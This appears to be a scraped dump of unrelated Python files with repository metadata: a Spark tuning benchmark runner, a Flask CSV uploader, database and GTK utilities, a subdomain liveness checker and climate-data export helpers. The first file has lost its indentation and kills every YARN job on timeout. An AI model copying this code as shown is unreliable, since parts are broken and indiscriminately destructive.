spark_conf_names = ['spark.default.parallelism', 'spark.driver.cores', 'spark.driver.memory',
'spark.driver.maxResultSize',
'spark.executor.instances', 'spark.executor.cores', 'spark.executor.memory',
'spark.executor.memoryOverhead',
'spark.files.maxPartitionBytes', 'spark.memory.fraction', 'spark.memory.storageFraction',
'spark.reducer.maxSizeInFlight',
'spark.shuffle.compress', 'spark.shuffle.file.buffer', 'spark.shuffle.spill.compress']
AppName = ['ConnectedComponent', 'DecisionTree', 'KMeans', 'LabelPropagation', 'LinearRegression',
'LogisticRegression', 'PageRank',
'PCA', 'PregelOperation', 'ShortestPaths', 'StronglyConnectedComponent', 'SVDPlusPlus', 'SVM', 'Terasort',
'TriangleCount']
result_sizes = ['200m', '500m', '1g', '2g', '4g']
last_log = ""
def get_conf_str(params):
executor_cores, executor_num, mem_fraction, executor_mem, parallelism_vals, driver_cores,\
driver_mem, driver_maxResultSize, executor_memoryOverhead, files_maxPartitionBytes, mem_storageFraction,\
reducer_maxSizeInFlight, shuffle_compress, shuffle_file_buffer, shuffle_spill_compress = params
# executor_memoryOverhead = 16 - executor_mem
return_str = ""
return_str += ''' --conf "spark.executor.cores=''' + str(executor_cores) + '''" '''
return_str += ''' --conf "spark.executor.memory=''' + str(executor_mem) + '''g" '''
return_str += ''' --conf "spark.executor.instances=''' + str(executor_num) + '''" '''
return_str += ''' --conf "spark.memory.fraction=''' + str(float(mem_fraction)/10) + '''" '''
return_str += ('''--conf "spark.default.parallelism=''' + str(parallelism_vals) + '''" ''')
return_str += ('''--conf "spark.driver.cores=''' + str(driver_cores) + '''" ''')
return_str += ('''--conf "spark.driver.memory=''' + str(driver_mem) + '''g" ''')
return_str += ('''--conf "spark.driver.maxResultSize=''' + str(result_sizes[int(driver_maxResultSize)]) + '''" ''')
return_str += ('''--conf "spark.executor.memoryOverhead=''' + str(executor_memoryOverhead * 512) + '''m" ''')
return_str += ('''--conf "spark.files.maxPartitionBytes=''' + str(files_maxPartitionBytes * 64) + '''m" ''')
return_str += ('''--conf "spark.memory.storageFraction=''' + str(float(mem_storageFraction)/10) + '''" ''')
return_str += ('''--conf "spark.reducer.maxSizeInFlight=''' + str(reducer_maxSizeInFlight*32) + '''m" ''')
bool_vals = ['true', 'false']
return_str += ('''--conf "spark.shuffle.compress=''' + str(bool_vals[int(shuffle_compress)]) + '''" ''')
return_str += ('''--conf "spark.shuffle.file.buffer=''' + str(shuffle_file_buffer*32) + '''k" ''')
return_str += ('''--conf "spark.shuffle.spill.compress=''' + str(bool_vals[int(shuffle_spill_compress)]) + '''" ''')
return_str += ('''--conf "spark.network.timeout=''' + str(300) + '''" ''')
return return_str
def get_shell_file(shell_file_path, params, workload_num):
shell_file = open(shell_file_path, 'w', encoding='utf-8')
shell_file.write(shell_content.front[workload_num])
shell_file.write(
''' echo_and_run sh -c " ${SPARK_HOME}/bin/spark-submit --class $CLASS \
--master ${APP_MASTER} ${SPARK_RUN_OPT} ''' +
get_conf_str(params) + ''' $JAR ${OPTION} 2>&1|tee ${BENCH_NUM}/${APP}_run_${START_TS}.dat"''')
shell_file.write(shell_content.rear)
def run_command(cmd_string, timeout=100):
p = subprocess.Popen(cmd_string, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, close_fds=True, start_new_session=True)
try:
(msg, errs) = p.communicate(timeout=timeout)
ret_code = p.poll()
if ret_code:
code = 1
msg = "[Error]Called Error : " + str(msg.decode('utf-8'))
else:
code = 0
# msg = str(msg.decode('utf-8'))
msg = "finished fucking successfully"
except subprocess.TimeoutExpired:
os.system("for i in `yarn application -list | awk '{print $1}' | grep application_`; do yarn application -kill $i; done ")
p.kill()
p.terminate()
os.killpg(p.pid, signal.SIGTERM)
code = 1
msg = "[ERROR]Timeout Error : Command '" + cmd_string + "' timed out after " + str(timeout) + " seconds"
except Exception as e:
code = 1
msg = "[ERROR]Unknown Error : " + str(e)
return code, msg
def read_log(workload):
path = "log/" + workload
log = open(path,'r',encoding='utf-8')
all_stage_info = {}
for line in log:
try:
line_json = json.loads(line)
except:
print('json错误')
continue
# shuffle read/write、input/output
if line_json['Event'] == 'SparkListenerTaskEnd':
cur_stage = line_json['Stage ID']
# new stage
if line_json['Stage ID'] not in all_stage_info:
all_stage_info[cur_stage] = [0, 0, 0, 0]
# if line_json['Stage ID'] != cur_stage:
# cur_metrics, cur_stage = {'input': 0, 'output': 0, 'read': 0, 'write': 0}, line_json['Stage ID']
try:
all_stage_info[cur_stage][0] += line_json['Task Metrics']['Input Metrics']['Bytes Read']
all_stage_info[cur_stage][1] += line_json['Task Metrics']['Output Metrics']['Bytes Written']
all_stage_info[cur_stage][2] += (line_json['Task Metrics']['Shuffle Read Metrics']['Remote Bytes Read'] +
line_json['Task Metrics']['Shuffle Read Metrics']['Local Bytes Read'])
all_stage_info[cur_stage][3] += line_json['Task Metrics']['Shuffle Write Metrics']['Shuffle Bytes Written']
except:
print('metrics key error')
break
return len(all_stage_info.values()), list(all_stage_info.values())
def get_rs(action):
# find log
his_file_list = hdfs.ls("/history/")
log_path = his_file_list[-1]
global last_log
if last_log == log_path:
return 10000
last_log = log_path
print("Application:" + last_log)
log_file = hdfs.open(log_path, 'rt', encoding='utf-8')
start_timestamp = None
end_timestamp = None
for line in log_file:
try:
line_json = json.loads(line)
except:
print('json错误')
continue
if line_json['Event'] == 'SparkListenerEnvironmentUpdate':
spark_props = line_json['Spark Properties']
s = ''
for conf_name in spark_conf_names:
s = s + spark_props[conf_name] + ", "
print()
print(s)
print(action)
print()
if line_json['Event'] == 'SparkListenerApplicationStart':
start_timestamp = line_json['Timestamp']
if line_json['Event'] == 'SparkListenerApplicationEnd':
end_timestamp = line_json['Timestamp']
if line_json['Event'] == 'SparkListenerJobEnd':
if line_json['Job Result']['Result'] != 'JobSucceeded':
break
if start_timestamp and end_timestamp:
duration = float(int(end_timestamp) - int(start_timestamp))/1000
else:
return 10000
return duration
def run_bench(workload, params):
workload_num = AppName.index(workload)
# spark_bench_path = "C:/Users/86159/PycharmProjects/Reinforcement_Learning_in_Action-master/"
spark_bench_path = "/home/spark_user/lib/spark-bench-legacy/"
shell_file_path = spark_bench_path + workload + "/bin/my-run.sh"
get_shell_file(shell_file_path, params, workload_num)
# os.system("bash " + shell_file_path)
code, msg = run_command("bash " + shell_file_path, timeout=600)
time.sleep(10)
# return code, msg
if __name__ == "__main__":
run_bench("LinearRegression",[1, 1, 1, 1, 1, 1, 1, 0, 4, 1, 1, 1, 0, 1, 0]) | TsinghuaDatabaseGroup/AI4DBCode | Spark-Tuning/prediction_nn/run_action.py | run_action.py | py | 8,108 | python | en | code | 56 | github-code | 1 | [
{
"api_name": "shell_content.front",
"line_number": 55,
"usage_type": "attribute"
},
{
"api_name": "shell_content.rear",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "subprocess.Popen",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "sub... |
15859503196 | from crypt import methods
from flask import Flask , render_template, request, make_response
from werkzeug.wrappers import Response
import os
from .healpers.CsvHealper import allowed_file, parse_user_file, generate_file
def create_app():
app = Flask(__name__)
app.secret_key = os.environ["Secret"]
return app
app = create_app()
@app.route("/")
def hello_world():
'''
index page
'''
return render_template("index.html")
@app.route("/upload", methods=['post'])
def handlecsv():
try:
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
return render_template("index.html", error = 'No file part' )
file = request.files['file']
# If the user does not select a file, the browser submits an
# empty file without a filename.
if file.filename == '':
return render_template("index.html", error = 'No selected file' )
if file and allowed_file(file.filename):
data = parse_user_file(file)
if type(data) ==list:
# stream the response as the data is generated
response = Response(generate_file(data), mimetype='text/csv')
# add a filename
response.headers.set("Content-Disposition", "attachment", filename=f"{file.filename}-transformed.csv")
return response
else:
return render_template("index.html", error = f"error while reading the file : {data}" )
else:
return render_template("index.html", error = 'format not supported, please upload csv file' )
except Exception as e:
return make_response({'message': f'error {e}'},500) | Maminebouzid/flask_upload_csv | app/__init__.py | __init__.py | py | 2,028 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "flask.render_template",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.request.method... |
72133950755 | #!/usr/bin/python3
# 9-model_state_filter_a.py
"""Script that lists all State that contains the letter a
from the database hbtn_0e_6_usa
"""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from model_state import Base, State
from sys import argv
def firstState():
"""Prints first state
"""
engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'.format(
argv[1],
argv[2],
argv[3]),
pool_pre_ping=True)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
states = session.query(State).filter(State.name.contains("a"))
for state in states:
print("{}: {}".format(state.id, state.name))
session.close()
if __name__ == '__main__':
firstState()
| jonseb974/holbertonschool-higher_level_programming | python-object_relational_mapping/9-model_state_filter_a.py | 9-model_state_filter_a.py | py | 804 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "sys.argv",
"line_numbe... |
17407487909 | import gtk
import thermo
class SteamSolver:
def __init__(self):
'''Initial window which has a combo box from which the user can choose either of temperature and pressure'''
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.set_size_request(500 , 500)
self.window.set_title('Steam Solver')
self.window.connect('delete-event' , gtk.main_quit)
self.window.modify_bg(gtk.STATE_NORMAL , gtk.gdk.Color(red = 20000, blue = 20000 , green = 20000))
self.TableCreator()
def TableCreator(self):
self.PropertyList =['Pressure' , 'Temperature' , 'Volume(v)' , 'Energy(u)' ,'Enthalpy(h)' , 'Entropy(s)' , 'Quality(x)']
self.FinalList = []
self.table = gtk.Table(500 ,500 , True)
self.label = gtk.Label('Choose any one')
self.table.attach(self.label , 25 , 225 , 25 , 60 )
self.box = gtk.combo_box_new_text()
self.box.append_text('Pressure')
self.box.append_text('Temperature')
self.box.connect('changed' , self.PresTemp)
self.table.attach(self.box , 275 , 450 , 25 , 60)
self.window.add(self.table)
self.window.show_all()
def _helper(self , FinalList):
try:
Property1 = self.PresTempEnt.get_text()
Property2 = self.PropertyEntry.get_text()
if FinalList[0] == 'P':
if FinalList[1] == 'Temperature':
a = thermo.State(P = float(Property1), T = float(Property2))
return a
elif FinalList[1] == 'Volume(v)':
a = thermo.State(P = float(Property1), v = float(Property2))
return a
elif FinalList[1] == 'Energy(u)':
a = thermo.State(P = float(Property1), u = float(Property2))
return a
elif FinalList[1] == 'Enthalpy(h)':
a = thermo.State(P = float(Property1), h = float(Property2))
return a
elif FinalList[1] == 'Entropy(s)':
a = thermo.State(P = float(Property1), s = float(Property2))
return a
elif FinalList[1] == 'Quality(x)':
a = thermo.State(P = float(Property1), x = float(Property2))
return a
if FinalList[0] == 'T':
if FinalList[1] == 'Volume(v)':
a = thermo.State(P = float(Property1), v = float(Property2))
return a
elif FinalList[1] == 'Energy(u)':
a = thermo.State(P = float(Property1), u = float(Property2))
return a
elif FinalList[1] == 'Enthalpy(h)':
a = thermo.State(P = float(Property1), h = float(Property2))
return a
elif FinalList[1] == 'Entropy(s)':
a = thermo.State(P = float(Property1), s = float(Property2))
return a
elif FinalList[1] == 'Quality(x)':
a = thermo.State(P = float(Property1), x = float(Property2))
return a
except ValueError:
a = 'Error'
return a
def PresTemp(self , widget):
'''Function called when the combo box is changed , the window gets another label and an
entry into which the user can tpe the required value of temperature and pressure'''
index = widget.get_active()
widget.destroy()
self.Entry1 = gtk.Entry()
self.table.attach(self.Entry1 , 275 , 450 , 25 , 60)
self.PresTempLab = gtk.Label()
self.PresTempEnt = gtk.Entry()
self.table.attach(self.PresTempLab , 25 , 225 , 120 , 155)
self.table.attach(self.PresTempEnt , 275 , 450 , 120 , 155)
if index == 0:
self.FinalList.append('P')
self.PropertyList.remove('Pressure')
self.PresTempLab.set_text('Enter Pressure')
self.Entry1.set_text('Pressure')
self.Entry1.set_editable(False)
else:
self.FinalList.append('T')
self.PropertyList.remove('Temperature')
self.PresTempLab.set_text('Enter Temperature')
self.Entry1.set_text('Temperature')
self.Entry1.set_editable(False)
self.button = gtk.Button('Process')
self.button.connect('clicked' , self.Process , index)
self.table.attach(self.button , 200 , 300 , 420 , 480)
self.window.show_all()
def Process(self , widget , index):
'''Function called by the button Process , Checks whether the input is valid or not
If the input is valid , then another label and a combo box are added. The user can
choose any other property other then temperature or pressure which was entered'''
UserEntry = self.PresTempEnt.get_text()
self.PresTempEnt.set_editable(False)
widget.destroy()
self.SecondStateLab = gtk.Label('Enter Second Property')
self.Combo = gtk.combo_box_new_text()
for Property in self.PropertyList:
self.Combo.append_text(Property)
self.Combo.connect('changed' , self.SecState)
self.table.attach(self.SecondStateLab , 25 , 225 , 215 , 250)
self.table.attach(self.Combo , 275 , 450 , 215 , 250)
self.window.show_all()
def SecState(self , widget):
self.index = widget.get_active()
self.PropertyEntry = gtk.Entry()
self.PropertyLabel = gtk.Label('Enter ' + self.PropertyList[self.index])
self.FinalList.append(self.PropertyList[self.index])
widget.destroy()
self.OptionsLabel = gtk.Entry()
self.OptionsLabel.set_text(self.PropertyList[self.index])
self.OptionsLabel.set_editable(False)
self.table.attach(self.OptionsLabel , 275 , 450 , 215 , 250)
self.table.attach(self.PropertyLabel , 25 , 225 , 310 , 345)
self.table.attach(self.PropertyEntry , 275 , 450 , 310 , 345)
self.button2= gtk.Button('Process')
self.button2.connect('clicked' , self.FinalState)
self.table.attach(self.button2 , 200 , 300 , 420 , 480)
self.window.show_all()
def FinalState(self , widget):
widget.set_label('Reset')
a = self._helper(self.FinalList)
self.label.destroy()
self.PresTempLab.destroy()
self.PresTempEnt.destroy()
self.Entry1.destroy()
self.PropertyEntry.destroy()
self.PropertyLabel.destroy()
self.OptionsLabel.destroy()
self.SecondStateLab.destroy()
if a == 'Error':
self.warning = gtk.Label('P L E A S E E N T E R V A L I D I N P U T')
self.table.attach(self.warning , 25 , 475 , 25 , 375)
self.window.show_all()
else:
self.TemperatureEntry = gtk.Entry()
self.TemperatureLabel = gtk.Label('Temperature')
self.PressureEntry = gtk.Entry()
self.PressureLabel = gtk.Label('Pressure')
self.table.attach(self.TemperatureLabel, 25 , 225 , 25 , 55)
self.table.attach(self.TemperatureEntry , 275 , 450 , 25 , 55)
self.TemperatureEntry.set_text(str(a.GetTemp()))
self.TemperatureEntry.set_editable(False)
self.table.attach(self.PressureLabel, 25 , 225 , 75 , 105)
self.table.attach(self.PressureEntry , 275 , 450 , 75 , 105)
self.PressureEntry.set_text(str(a.GetPressure()))
self.PressureEntry.set_editable(False)
self.VolumeEntry = gtk.Entry()
self.VolumeLabel = gtk.Label('Volume(v):')
self.table.attach(self.VolumeLabel, 25 , 225 , 125 , 155)
self.table.attach(self.VolumeEntry , 275 , 450 , 125 , 155)
self.VolumeEntry.set_text(str(a.GetVolume()))
self.VolumeEntry.set_editable(False)
self.EnergyEntry = gtk.Entry()
self.EnergyLabel = gtk.Label('Internal Energy(U):')
self.table.attach(self.EnergyLabel, 25 , 225 , 175 , 205)
self.table.attach(self.EnergyEntry , 275 , 450 , 175 , 205)
self.EnergyEntry.set_text(str(a.GetEnergy()))
self.EnergyEntry.set_editable(False)
self.EnthalpyEntry = gtk.Entry()
self.EnthalpyLabel = gtk.Label('Enthalpy(H):')
self.table.attach(self.EnthalpyLabel, 25 , 225, 225 , 255)
self.table.attach(self.EnthalpyEntry , 275 , 450 , 225 , 255)
self.EnthalpyEntry.set_text(str(a.GetEnthalpy()))
self.EnthalpyEntry.set_editable(False)
self.EntropyEntry = gtk.Entry()
self.EntropyLabel = gtk.Label('Entropy(s):')
self.table.attach(self.EntropyLabel, 25 , 225 , 275 , 305)
self.table.attach(self.EntropyEntry , 275 , 450 , 275 , 305)
self.EntropyEntry.set_text(str(a.GetEntropy()))
self.EntropyEntry.set_editable(False)
self.QualityEntry = gtk.Entry()
self.QualityLabel = gtk.Label('Quality(x):')
self.table.attach(self.QualityLabel, 25 , 225 , 325 , 355)
self.table.attach(self.QualityEntry , 275 , 450 ,325 , 355)
self.QualityEntry.set_text(str(a.GetQuality()))
self.QualityEntry.set_editable(False)
self.window.show_all()
widget.connect('clicked' , self.destroy)
def destroy(self , widget):
self.table.destroy()
self.TableCreator()
class main:
SteamSolver()
gtk.main()
if __name__ == '__main__':
main()
| MechCoder/Steam-Solver | Steamsolver.py | Steamsolver.py | py | 9,908 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gtk.Window",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "gtk.WINDOW_TOPLEVEL",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "gtk.main_quit",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "gtk.STATE_NORM... |
19926976795 | import keras
from keras.datasets import mnist
from keras.models import load_model
def Getdata():
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)
x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)
x_train = x_train / 255
x_test = x_test / 255
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
data = x_test[0].reshape(-1)
ans = y_test[0]
for i in range(28):
for j in range(28):
print("%.6f , " % data[i*28+j],end='')
print('')
print(ans)
Getdata() | Sun2018421/keras-Lenet-5 | getDataforEmbedded.py | getDataforEmbedded.py | py | 635 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "keras.datasets.mnist.load_data",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "keras.datasets.mnist",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "keras.utils.to_categorical",
"line_number": 13,
"usage_type": "call"
},
{
"api_... |
18900639652 | from django.shortcuts import render
from django.http import HttpResponse
from django.template import RequestContext
from .forms import Mp3DetailsForm
from gtts import gTTS
import os
import time
def index(request):
if request.method == 'POST':
context = RequestContext(request)
aform = Mp3DetailsForm(request.POST)
if aform.is_valid():
file_name = aform.cleaned_data['file_name'].replace(" ", "")
text = aform.cleaned_data['text']
create_sound(file_name, text)
file_path = '/Users/ivanG/Documents/text_to_speech/Text_to_Speech/' + file_name + ".mp3"
while not os.path.exists(file_path):
time.sleep(1)
if os.path.exists(file_path):
break;
print("file about to be opened")
fsock = open(file_path, 'r')
response = HttpResponse(fsock, content_type='audio/mpeg')
response['Content-Disposition'] = "attachment; filename=%s.mp3" % file_name
return response
else:
aform = Mp3DetailsForm()
return render(request, 'tts/createmp3.html')
else:
form = Mp3DetailsForm()
context = RequestContext(request)
return render(request, 'tts/index.html', {'form': form})
def create_sound(file_name, text):
txt = text
tts = gTTS(text=txt, lang='en')
tts.save(file_name + ".mp3")
return tts
| me12722/text-to-speech | Text_to_Speech/tts/views.py | views.py | py | 1,449 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.template.RequestContext",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "forms.Mp3DetailsForm",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os... |
6517886216 | #Tool check active subdomain from amass result
from concurrent.futures import ThreadPoolExecutor
import requests
from requests.exceptions import ConnectionError
import argparse
parser = argparse.ArgumentParser(description='Example argument parser')
parser.add_argument('--input_file','-i', help='path to input file')
parser.add_argument('--output-file', '-o', default='output.txt', help='path to output file')
args = parser.parse_args()
domain_list = []
active_domain = []
def read_file(file):
with open(file, 'r') as f:
for url in f:
url = url.replace('\n','')
domain_list.append(url)
def validate_existence(domain):
try:
response = requests.get(domain, timeout=10)
except ConnectionError:
print(f'Domain {domain} [is dead]')
else:
print(f'Domain {domain} [is active]')
active_domain.append(domain)
def write_file():
with open(args.output_file, 'w') as f:
for url in active_domain:
f.write(url + '\n')
read_file(args.input_file)
with ThreadPoolExecutor() as executor:
executor.map(validate_existence, domain_list)
write_file() | quangdaik2362001/simple_tool | is_live.py | is_live.py | py | 1,171 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "requests.exceptions.ConnectionError",
"line_number": 25,
"usage_type": "name"
},
{
"api_name"... |
72617146914 | #!/usr/bin/env python3
import re
import csv
import collections
def get_error_message_type(log):
if re.search(r"ERROR", log):
return "ERROR"
if re.search(r"INFO", log):
return "INFO"
def find_errors():
error_dict = {}
with open("syslog.log", "r") as logfile:
for line in logfile:
if re.search(r"ERROR", line):
print(line)
print("FOUND AN ERROR")
error_message = str(re.search(r"(ticky).*?\s*\(", line).group(0)).replace(" (", "").replace("ticky: ERROR ", "")
if error_message not in error_dict:
error_dict[error_message] = 0
error_dict[error_message] += 1
if re.search(r"INFO", line):
pass
return error_dict
def get_per_user_errors():
per_user_errors = {}
with open("syslog.log", "r") as logfile:
for line in logfile:
username = str(re.search(r"\(.*\)", line).group(0)).replace("(", "").replace(")", "")
if username not in per_user_errors:
per_user_errors[username] = {"INFO": 0, "ERROR": 0}
per_user_errors[username][get_error_message_type(line)] +=1
return per_user_errors
def write_per_user_dict_to_csv(d):
with open('user_statistics.csv','w', newline='', encoding='utf-8') as f:
w = csv.writer(f)
header = ["Username", "INFO", "ERROR"]
w.writerow(header)
od = collections.OrderedDict(sorted(d.items()))
for k, v in od.items():
row = [k, v["INFO"], v["ERROR"]]
w.writerow(row)
def write_error_dict_to_csv(d):
with open("error_message.csv", "w", newline="", encoding="utf-8") as f:
w = csv.writer(f)
header = ["Error", "Count"]
od = sorted(d.items(), key=lambda x: x[1], reverse=True)
w.writerow(header)
for row in od:
w.writerow(row)
if __name__ == '__main__':
different_error_messages_dict = find_errors()
write_error_dict_to_csv(different_error_messages_dict)
per_user_errors = get_per_user_errors()
write_per_user_dict_to_csv(per_user_errors)
| annie21409/google-python-professional | final_project/tickylog.py | tickylog.py | py | 2,178 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.search",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 19,
"u... |
26593044181 | """Backend functions for exporting data."""
import os
import boto3
import fsspec
import shutil
import logging
import warnings
import datetime
import xarray as xr
import pandas as pd
from importlib.metadata import version as _version
from botocore.exceptions import ClientError
from climakitae.util.utils import read_csv_file
from climakitae.core.paths import variable_descriptions_csv_path, stations_csv_path
xr.set_options(keep_attrs=True)
bytes_per_gigabyte = 1024 * 1024 * 1024
def _estimate_file_size(data, format):
"""
Estimate file size in gigabytes when exporting `data` in `format`.
Parameters
----------
data : xarray.DataArray or xarray.Dataset
data to export to the specified `format`
format : str
file format ("NetCDF" or "CSV")
Returns
-------
float
estimated file size in gigabytes
"""
if format == "NetCDF":
if isinstance(data, xr.core.dataarray.DataArray):
if not data.name:
# name it in order to call to_dataset on it
data.name = "data"
data_size = data.to_dataset().nbytes
else: # data is xarray Dataset
data_size = data.nbytes
buffer_size = 2 * 1024 * 1024 # 2 MB for miscellaneous metadata
est_file_size = data_size + buffer_size
elif format == "CSV":
pass # TODO: estimate CSV file size
return est_file_size / bytes_per_gigabyte
def _warn_large_export(file_size, file_size_threshold=5):
if file_size > file_size_threshold:
print(
"WARNING: Estimated file size is "
+ str(round(file_size, 2))
+ " GB. This might take a while!"
)
def _list_n_none_to_string(dic):
"""Convert list and None to string."""
for k, v in dic.items():
if isinstance(v, list):
dic[k] = str(v)
if v is None:
dic[k] = ""
return dic
def _update_attributes(data):
"""
Update data attributes to prevent issues when exporting them to NetCDF.
Convert list and None attributes to strings. If `time` is a coordinate of
`data`, remove any of its `units` attribute. Attributes include global data
attributes as well as that of coordinates and data variables.
Parameters
----------
data : xarray.DataArray or xarray.Dataset
Returns
-------
None
Notes
-----
These attribute updates resolve errors raised when using the scipy engine
to write NetCDF files to S3.
"""
data.attrs = _list_n_none_to_string(data.attrs)
for coord in data.coords:
data[coord].attrs = _list_n_none_to_string(data[coord].attrs)
if "time" in data.coords and "units" in data["time"].attrs:
del data["time"].attrs["units"]
if isinstance(data, xr.core.dataarray.Dataset):
for data_var in data.data_vars:
data[data_var].attrs = _list_n_none_to_string(data[data_var].attrs)
def _unencode_missing_value(d):
"""Drop `missing_value` encoding, if any, on data object `d`."""
try:
del d.encoding["missing_value"]
except:
pass
def _update_encoding(data):
"""
Update data encodings to prevent issues when exporting them to NetCDF.
Drop `missing_value` encoding, if any, on `data` as well as its coordinates
and data variables.
Parameters
----------
data : xarray.DataArray or xarray.Dataset
Returns
-------
None
Notes
-----
These encoding updates resolve errors raised when writing NetCDF files to
S3.
"""
_unencode_missing_value(data)
for coord in data.coords:
_unencode_missing_value(data[coord])
if isinstance(data, xr.core.dataarray.Dataset):
for data_var in data.data_vars:
_unencode_missing_value(data[data_var])
def _create_presigned_url(bucket_name, object_name, expiration=60 * 60 * 24 * 7):
"""
Generate a presigned URL to share an S3 object.
Parameters
----------
bucket_name : string
object_name : string
expiration : int, optional
Time in seconds for the presigned URL to remain valid. The default is
one week.
Returns
-------
string
Presigned URL. If error, returns None.
References
----------
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/s3-presigned-urls.html#presigned-urls
"""
s3_client = boto3.client("s3")
try:
url = s3_client.generate_presigned_url(
"get_object",
Params={"Bucket": bucket_name, "Key": object_name},
ExpiresIn=expiration,
)
except ClientError as e:
logging.error(e)
return None
return url
def _export_to_netcdf(data, save_name):
"""
Export user-selected data to NetCDF format.
Export the xarray DataArray or Dataset `data` to a NetCDF file `save_name`.
If there is enough disk space, the function saves the file locally;
otherwise, it saves the file to the S3 bucket `cadcat-tmp` and provides a
URL for download.
Parameters
----------
data : xarray.DataArray or xarray.Dataset
data to export to NetCDF format
save_name : string
desired output file name, including the file extension
Returns
-------
None
"""
est_file_size = _estimate_file_size(data, "NetCDF")
disk_space = shutil.disk_usage("./")[2] / bytes_per_gigabyte
if disk_space > est_file_size:
path = "./" + save_name
if os.path.exists(path):
raise Exception(
(
f"File {save_name} exists. "
"Please either delete that file from the work space "
"or specify a new file name here."
)
)
print("Alright, exporting specified data to NetCDF.")
_warn_large_export(est_file_size)
_update_attributes(data)
_update_encoding(data)
comp = dict(_FillValue=None)
encoding = {coord: comp for coord in data.coords}
data.to_netcdf(path, encoding=encoding)
print(
(
"Saved! You can find your file in the panel to the left"
" and download to your local machine from there."
)
)
else:
path = f"simplecache::{os.environ['SCRATCH_BUCKET']}/{save_name}"
with fsspec.open(path, "wb") as fp:
print("Alright, exporting specified data to NetCDF.")
_warn_large_export(est_file_size)
_update_attributes(data)
_update_encoding(data)
comp = dict(_FillValue=None)
encoding = {coord: comp for coord in data.coords}
data.to_netcdf(fp, encoding=encoding)
download_url = _create_presigned_url(
bucket_name="cadcat-tmp", object_name=path.split("cadcat-tmp/")[-1]
)
print(
(
"Saved! To download the file to your local machine, "
"open the following URL in a web browser:"
"\n\n"
f"{download_url}"
"\n\n"
"Note: The URL will remain valid for 1 week."
)
)
def _get_unit(dataarray):
"""
Return unit of data variable in `dataarray`, if any, or an empty string.
Parameters
----------
dataarray : xarray.DataArray
Returns
-------
str
"""
data_attrs = dataarray.attrs
if "units" in data_attrs and data_attrs["units"] is not None:
return data_attrs["units"]
else:
return ""
def _ease_access_in_R(column_name):
"""
Return a copy of the input that can be used in R easily.
Modify the `column_name` string so that when it is the name of an R data
table column, the column can be accessed by $. The modified string contains
no spaces or special characters, and starts with a letter or a dot.
Parameters
----------
column_name : str
Returns
-------
str
Notes
-----
The input is assumed to be a column name of a pandas DataFrame converted
from an xarray DataArray or Dataset available on the Cal-Adapt Analytics
Engine. The conversions are through the to_dataframe method.
The function acts on one of the display names of the variables:
https://github.com/cal-adapt/climakitae/blob/main/climakitae/data/variable_descriptions.csv
or one of the station names:
https://github.com/cal-adapt/climakitae/blob/main/climakitae/data/hadisd_stations.csv
"""
return (
column_name.replace("(", "")
.replace(")", "")
.replace(" ", "_")
.replace("-", "_")
)
def _update_header(df, variable_unit_map):
"""
Update data table header to match the given variable names and units.
Update the header of the DataFrame `df` so that name and unit of the data
variable contained in each column are as specified in `variable_unit_map`.
The resulting header starts with a row labeled "variable" holding variable
names. A 2nd "unit" row include the units associated with the variables.
Parameters
----------
df : pandas.DataFrame
data table to update
variable_unit_map : list of tuple
list of tuples where each tuple contains the name and unit of the data
variable in a column of the input data table
Returns
-------
pandas.DataFrame
data table with updated header
"""
df.columns = pd.MultiIndex.from_tuples(
variable_unit_map,
name=["variable", "unit"],
)
df.reset_index(inplace=True) # simplifies header
return df
def _dataarray_to_dataframe(dataarray):
"""
Prepare xarray DataArray for export as CSV file.
Convert the xarray DataArray `dataarray` to a pandas DataFrame ready to be
exported to CSV format. The DataArray is converted through its to_dataframe
method. The DataFrame header is renamed as needed to ease the access of
columns in R. It is also enriched with the unit associated with the data
variable in the DataArray.
Parameters
----------
dataarray : xarray.DataArray
data to be prepared for export
Returns
-------
pandas.DataFrame
data ready for export
"""
if not dataarray.name:
# name it in order to call to_dataframe on it
dataarray.name = "data"
df = dataarray.to_dataframe()
variable = dataarray.name
unit = _get_unit(dataarray)
variable_unit_map = []
for col in df.columns:
if col == variable:
variable_unit_map.append((_ease_access_in_R(col), unit))
else:
variable_unit_map.append((_ease_access_in_R(col), ""))
df = _update_header(df, variable_unit_map)
return df
def _dataset_to_dataframe(dataset):
"""
